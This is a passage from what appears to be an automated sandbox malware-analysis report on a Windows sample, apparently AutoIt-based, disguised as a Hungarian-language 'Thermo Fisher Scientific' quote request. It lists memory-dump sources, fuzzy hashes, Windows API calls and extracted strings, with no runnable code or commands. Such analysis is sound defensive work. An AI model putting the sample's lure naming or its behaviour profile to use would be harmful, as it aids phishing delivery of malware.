                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8be1465b6903429252ca78f4b058b718fe42fc2276a23131db4b9f02dd0eccb
                                                              • Instruction ID: dd8010efbe921cc18ce7350926bb4c40a057b90f22dd63efdf3c383ad43da083
                                                              • Opcode Fuzzy Hash: d8be1465b6903429252ca78f4b058b718fe42fc2276a23131db4b9f02dd0eccb
                                                              • Instruction Fuzzy Hash: 2522B174944225CFDB28DF54C480AEAB7F2FF14304F28C869D94A9B391E736AD81CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5df67e1c0b5e059b2155d50892880ed4f8ae701e059cb7344ac897134f9aff3
                                                              • Instruction ID: fc04a9f302c9578fc28750e18171dc75163a6eed71d986e9c03fc52fbe970c42
                                                              • Opcode Fuzzy Hash: d5df67e1c0b5e059b2155d50892880ed4f8ae701e059cb7344ac897134f9aff3
                                                              • Instruction Fuzzy Hash: FA127070A002099FDF48DFA5D991AEEB7F7FF48300F108569E406E7291EB36A951CB64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3728558374-0
                                                              • Opcode ID: a7fc9e6eb9a8657ad2f4447b3a39aa8d638b8c90da9959f98175c6b4f9b9d678
                                                              • Instruction ID: 180bbd3fdf9450829a30d3a05c095e9a6df232857857a11ca55a757abc2bf8a2
                                                              • Opcode Fuzzy Hash: a7fc9e6eb9a8657ad2f4447b3a39aa8d638b8c90da9959f98175c6b4f9b9d678
                                                              • Instruction Fuzzy Hash: 1902B3B0A00206DBCF48DF64D991AAFB7F6EF44300F14C469E80ADB295EB35DA51CB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                              • Instruction ID: 951774ad114431a4ebb938485fa6264d1e9bfe8382be5e62eb6b67eaa2aa7284
                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                              • Instruction Fuzzy Hash: 7CC1D8322055E30AEF1D473994344BEFAA25A917B171E076DE4B3CB6D2FF20C564DA20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                              • Instruction ID: c076301709fdc9a41c229b6b2d32e7c7431915015ec4d3d28a5d02eb73437864
                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                              • Instruction Fuzzy Hash: 7EC1E7322055E309EF2D4739D4344BEBAA25A927B171E136DE4B3CB6D6FF20C564DA20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: 9359b207b7ab32aed460637ddaa14fedfaf6567c0773e0f92b9fbed59311d744
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 58C150322090D309DB2D4739C4744FEBAA25EA27B571E077DE4B2CB6D5FE20D5A4D620
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction ID: 7c64d7c81178419c34038a1924c5a98cd659fb1fdc399904b00af03f0a2e2380
                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction Fuzzy Hash: B341D571D1051CDBCF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction ID: 1d173ccfac49a96a512169c95a2444bf567a67a7614cfbe417cc05b6e348e014
                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction Fuzzy Hash: 69019D78A00209EFCB44DF98C5909AEF7F6FB88310F208699E819A7305D730EE41DB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction ID: 1ca985b3ca37fb2545091c078ff02d3c404007767f309832940b63b6f5b2b1cf
                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction Fuzzy Hash: 32014D78A01209EFCB58DF98C5909AEF7B6FB48310F248599E819A7745D730AE41DB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 0065A2FE
                                                              • DeleteObject.GDI32(00000000), ref: 0065A310
                                                              • DestroyWindow.USER32 ref: 0065A31E
                                                              • GetDesktopWindow.USER32 ref: 0065A338
                                                              • GetWindowRect.USER32(00000000), ref: 0065A33F
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0065A480
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0065A490
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A4D8
                                                              • GetClientRect.USER32(00000000,?), ref: 0065A4E4
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0065A51E
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A540
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A553
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A55E
                                                              • GlobalLock.KERNEL32(00000000), ref: 0065A567
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A576
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0065A57F
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A586
                                                              • GlobalFree.KERNEL32(00000000), ref: 0065A591
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A5A3
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0068D9BC,00000000), ref: 0065A5B9
                                                              • GlobalFree.KERNEL32(00000000), ref: 0065A5C9
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0065A5EF
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0065A60E
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A630
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A81D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: 6b724dba6629fb98e974ddaa8b270d139631f8fce015dd09524d9021de68a62a
                                                              • Instruction ID: 771bb547a9e1898df817c4178cb31356652d3eb21a8a2798093c9b5004e48456
                                                              • Opcode Fuzzy Hash: 6b724dba6629fb98e974ddaa8b270d139631f8fce015dd09524d9021de68a62a
                                                              • Instruction Fuzzy Hash: 5C026D75A00118EFDB14DFA4CD89EAE7BBAFF49311F108258F905AB2A1DB709D45CB60
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 0066D2DB
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0066D30C
                                                              • GetSysColor.USER32(0000000F), ref: 0066D318
                                                              • SetBkColor.GDI32(?,000000FF), ref: 0066D332
                                                              • SelectObject.GDI32(?,00000000), ref: 0066D341
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0066D36C
                                                              • GetSysColor.USER32(00000010), ref: 0066D374
                                                              • CreateSolidBrush.GDI32(00000000), ref: 0066D37B
                                                              • FrameRect.USER32(?,?,00000000), ref: 0066D38A
                                                              • DeleteObject.GDI32(00000000), ref: 0066D391
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0066D3DC
                                                              • FillRect.USER32(?,?,00000000), ref: 0066D40E
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0066D439
                                                                • Part of subcall function 0066D575: GetSysColor.USER32(00000012), ref: 0066D5AE
                                                                • Part of subcall function 0066D575: SetTextColor.GDI32(?,?), ref: 0066D5B2
                                                                • Part of subcall function 0066D575: GetSysColorBrush.USER32(0000000F), ref: 0066D5C8
                                                                • Part of subcall function 0066D575: GetSysColor.USER32(0000000F), ref: 0066D5D3
                                                                • Part of subcall function 0066D575: GetSysColor.USER32(00000011), ref: 0066D5F0
                                                                • Part of subcall function 0066D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066D5FE
                                                                • Part of subcall function 0066D575: SelectObject.GDI32(?,00000000), ref: 0066D60F
                                                                • Part of subcall function 0066D575: SetBkColor.GDI32(?,00000000), ref: 0066D618
                                                                • Part of subcall function 0066D575: SelectObject.GDI32(?,?), ref: 0066D625
                                                                • Part of subcall function 0066D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0066D644
                                                                • Part of subcall function 0066D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066D65B
                                                                • Part of subcall function 0066D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0066D670
                                                                • Part of subcall function 0066D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066D698
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 2a5d5be1dc1e7343e888ac15c4eeb0ebbb2bffe21c640645df6bcb6d988b376d
                                                              • Instruction ID: 7e3e2be82017345c8b4a13c4f5b67079d0b2ab718449146e8db6e5234ffc8930
                                                              • Opcode Fuzzy Hash: 2a5d5be1dc1e7343e888ac15c4eeb0ebbb2bffe21c640645df6bcb6d988b376d
                                                              • Instruction Fuzzy Hash: B2918E72508301BFCB109F64DC48E6B7BAAFF89325F101B19F9A2961E0D731D945CBA2
                                                              APIs
                                                              • DestroyWindow.USER32 ref: 0061B98B
                                                              • DeleteObject.GDI32(00000000), ref: 0061B9CD
                                                              • DeleteObject.GDI32(00000000), ref: 0061B9D8
                                                              • DestroyIcon.USER32(00000000), ref: 0061B9E3
                                                              • DestroyWindow.USER32(00000000), ref: 0061B9EE
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0067D2AA
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0067D2E3
                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0067D711
                                                                • Part of subcall function 0061B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0061B759,?,00000000,?,?,?,?,0061B72B,00000000,?), ref: 0061BA58
                                                              • SendMessageW.USER32 ref: 0067D758
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0067D76F
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0067D785
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0067D790
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              • Opcode ID: f9de9a5d8455723f5e7cc9c33ac5249d3164711f3d575731193b0fc9c00a7395
                                                              • Instruction ID: 56ebe7426f68695413dbf584481791dc34fb9a00ce23a9dcc909c6701ccb68a9
                                                              • Opcode Fuzzy Hash: f9de9a5d8455723f5e7cc9c33ac5249d3164711f3d575731193b0fc9c00a7395
                                                              • Instruction Fuzzy Hash: AA126E70104201EFDB15CF24C884BE9BBF6FF45314F189969E989CB692C731E886DBA1
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064DBD6
                                                              • GetDriveTypeW.KERNEL32(?,0069DC54,?,\\.\,0069DC00), ref: 0064DCC3
                                                              • SetErrorMode.KERNEL32(00000000,0069DC54,?,\\.\,0069DC00), ref: 0064DE29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: 65c55432f5b7e7cb90761274c2dbdd446f8b1eab22b75ca018cc601406a68666
                                                              • Instruction ID: 8dcf1b8460c093fda821bae3c71eedfeee51fdcafdc9e2cb00364218a516afa7
                                                              • Opcode Fuzzy Hash: 65c55432f5b7e7cb90761274c2dbdd446f8b1eab22b75ca018cc601406a68666
                                                              • Instruction Fuzzy Hash: F5519C70B88312ABC704DB10C8928AABBA3FFA5740B11591EB0439B3D5DB70D986DB46
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: fb49d10cd9355af57e6a73924a96d8dee96bce441cd45262471e0a8a8da95021
                                                              • Instruction ID: e7da53ca9b26b7581fce7cc326de682717d75e2c09cc6e3cb8276ec7006436cd
                                                              • Opcode Fuzzy Hash: fb49d10cd9355af57e6a73924a96d8dee96bce441cd45262471e0a8a8da95021
                                                              • Instruction Fuzzy Hash: 57812B70680216BBDB68AB64DC92FFF376BAF25310F04413CF9096A2C2EB60D945C795
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0066C788
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0066C83E
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0066C859
                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0066CB15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: 3a99f429cd1339769d0d9ae35fa264fb68e62ac4752f8c7ba3ca3edd8dc26369
                                                              • Instruction ID: 5a4c23d7bcbaa43954f47c6b15374de99b9c4ef61c1534e9c56a3111ebca3bff
                                                              • Opcode Fuzzy Hash: 3a99f429cd1339769d0d9ae35fa264fb68e62ac4752f8c7ba3ca3edd8dc26369
                                                              • Instruction Fuzzy Hash: AAF1D171104B45AFD7218F24C889BBABBE6FF49364F08061DF5D8963A1C774D841DBA2
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,0069DC00), ref: 00666449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 3964851224-45149045
                                                              • Opcode ID: 2ba2190981ecddabfbe2c93ec45466a474235d574055b71183fb86e1049004c6
                                                              • Instruction ID: ce2ce0470183e49c620a1af0b8d685df2d31cd92aa4e8877d3bd9c64bd519b31
                                                              • Opcode Fuzzy Hash: 2ba2190981ecddabfbe2c93ec45466a474235d574055b71183fb86e1049004c6
                                                              • Instruction Fuzzy Hash: BEC170702042468BCB44EF20D551AAE7B97AF94344F04486DF8965B3E3DF21ED8BCB86
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 0066D5AE
                                                              • SetTextColor.GDI32(?,?), ref: 0066D5B2
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0066D5C8
